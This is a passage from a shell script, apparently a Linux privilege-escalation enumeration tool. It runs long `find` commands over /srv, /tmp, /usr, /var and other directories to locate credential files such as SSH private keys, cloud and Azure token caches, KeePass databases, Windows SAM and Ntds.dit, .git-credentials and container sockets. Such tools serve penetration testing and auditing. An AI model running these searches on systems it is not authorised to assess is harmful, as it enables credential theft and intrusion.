\"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find ${ROOT_FOLDER}sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find ${ROOT_FOLDER}system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find ${ROOT_FOLDER}systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"rocketchat.service\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"sess_*\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"kadm5.acl\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"agent*\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"ssh*config\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"sess_*\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"kadm5.acl\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name 